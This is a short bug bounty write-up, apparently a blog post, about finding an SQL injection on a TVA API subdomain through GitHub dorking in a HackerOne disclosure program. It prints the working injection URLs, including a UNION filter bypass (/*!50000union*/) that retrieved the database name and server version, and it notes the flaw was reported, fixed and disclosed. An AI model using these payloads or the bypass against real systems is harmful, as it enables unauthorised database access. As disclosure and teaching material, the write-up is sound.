I found an SQL injection using Github dorking and here's my short story.

Never forget about Github dorking.
Last year, I was invited by TVA VDP via Hackerone . After reviewing their scope, I started my recon flow.

I always start with github dorking because most of the time it contains low hanging fruits and sometimes hidden subdomains. 

After a few minutes, I discovered an interesting endpoint within a hidden subdomain. When I say hidden, I mean a subdomain that can't be found via ordinary tools.

When gathering subdomains, never depend on automatic tools only. 

Tip: use bing.com search engine also, it's helpful because sometimes it gives you hidden endpoints too.

The moment I saw the endpoint, I thought of SQL injection. How? Well because it looks like the code GVDA1 is being checked in the database.

I added a single quote and the page responded with an MSSQL database error message

https://soa.tva.gov/api/river/observed-data/PICT1'  -> MSSQL database error message

https://soa.tva.gov/api/river/observed-data/PICT1'-- - -> No Error

https://soa.tva.gov/api/river/observed-data/PICT1' ORDER BY 2 -- - -> Database Error

https://soa.tva.gov/api/river/observed-data/PICT1' ORDER BY 1-- - -> No Error

https://soa.tva.gov/api/river/observed-data/PICT1' UNION SELECT db_name()-- - -> 400 CODE Error

I injected some Union payloads and it turned out that there was something blocking them all. After trying a few more payloads, I managed to craft a bypass which looks like this /*!50000Union*/

https://soa-accp.glbx.tva.gov/api/river/observed-data/-PICT1'+%2f*!50000union*%2f+SELECT+db_name()-- -

Responded With Database Name

FEWSDW

 

https://soa-accp.glbx.tva.gov/api/river/observed-data/-PICT1'+%2f*!50000union*%2f+SELECT+@@version-- -

Responded With MSSQL Version

Microsoft SQL Server 2017 (RTM-CU22-GDR) (KB4583457) - 14.0.3370.1 (X64) \n\tNov 6 2020 18:19:52 \n\tCopyright (C) 2017 Microsoft Corporation\n\tEnterprise Edition (64- bit) on Windows Server 2012 R2 Standard 6.3 < X64 > (Build 9600: ) (Hypervisor)\n

Summary. 

Reported on Mar 15th 2021 

Resolved on Mar 31st 2021  

Agreed to disclose Apr 26th 2022  

It's a small writeup but I want to teach you two things: 

- Always do github dorking the in early stages of your recon. 
- There are plenty of bypasses out there, try to use them all . 
 Last but not least, here are some useful resources to learn about SQL injection:

http://www.securityidiots.com/

https://kaoticcreations.blogspot.com/

 

Github Dorks:

https://kathan19.gitbook.io/howtohunt/sensitive-info-leaks/github-dorks

 

See you soon.